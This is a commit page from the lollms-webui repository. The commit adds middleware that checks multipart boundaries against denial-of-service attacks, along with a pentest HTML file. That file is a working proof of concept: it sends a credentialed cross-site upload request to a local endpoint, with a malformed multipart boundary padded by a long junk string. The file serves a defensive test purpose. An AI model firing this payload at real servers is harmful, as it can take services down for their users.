ExternalVendorCode/lollms-webui
1
0
Fork 0
mirror of https://github.com/ParisNeo/lollms-webui.git synced 2024-12-19 20:37:51 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added multipart boundary check to prevent from DOS attacks

Browse Source
This commit is contained in:
Saifeddine ALOUI 2024-09-11 23:11:00 +02:00
parent 9bd35deb01
commit 483431bb20
3 changed files with 34 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
app.py
View File

@ -89,7 +89,7 @@ from lollms.app import LollmsApplication
from lollms.paths import LollmsPaths from lollms.paths import LollmsPaths
from lollms.main_config import LOLLMSConfig from lollms.main_config import LOLLMSConfig
from lollms.utilities import trace_exception from lollms.utilities import trace_exception
from lollms.security import sanitize_path from lollms.security import sanitize_path, MultipartBoundaryCheck
from lollms_webui import LOLLMSWebUI from lollms_webui import LOLLMSWebUI
from pathlib import Path from pathlib import Path
from ascii_colors import ASCIIColors from ascii_colors import ASCIIColors
@ -124,6 +124,9 @@ def get_ip_addresses():
app = FastAPI(title="LoLLMS", description="This is the LoLLMS-Webui API documentation") app = FastAPI(title="LoLLMS", description="This is the LoLLMS-Webui API documentation")
# Add the MultipartBoundaryCheck middleware
app.add_middleware(MultipartBoundaryCheck)
#app.mount("/socket.io", StaticFiles(directory="path/to/socketio.js")) #app.mount("/socket.io", StaticFiles(directory="path/to/socketio.js"))

2
lollms_core

@ -1 +1 @@
Subproject commit 39ca9834901b2dc57fb781a6d0aab787afb0491a Subproject commit ab739e640f3382860a491a156ad1d319c01bbfd6

29
tests/pentests/multipart_dos/dos_attack.html Normal file
View File

@ -0,0 +1,29 @@
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost:9600/upload_app", true);
xhr.setRequestHeader("Accept", "application/json, text/plain, */*");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------30672353603658029961121811124");
xhr.withCredentials = true;
var body = "\r\n" +
"-----------------------------30672353603658029961121811124\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"M1F1-Alaw-AFsp.wav\"\r\n" +
"Content-Type: audio/wav\r\n" +
"\r\n" +
"dsadsdsa\r\n" +
"-----------------------------30672353603658029961121811124--Random-Characters-Or-Integers-Start-From-H-re9786452315697846512978645231569784651297864523156978465129786452315697846512978645231569784651297864523156978465129786452315697846512978645231569784651297864523156978465129786452";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>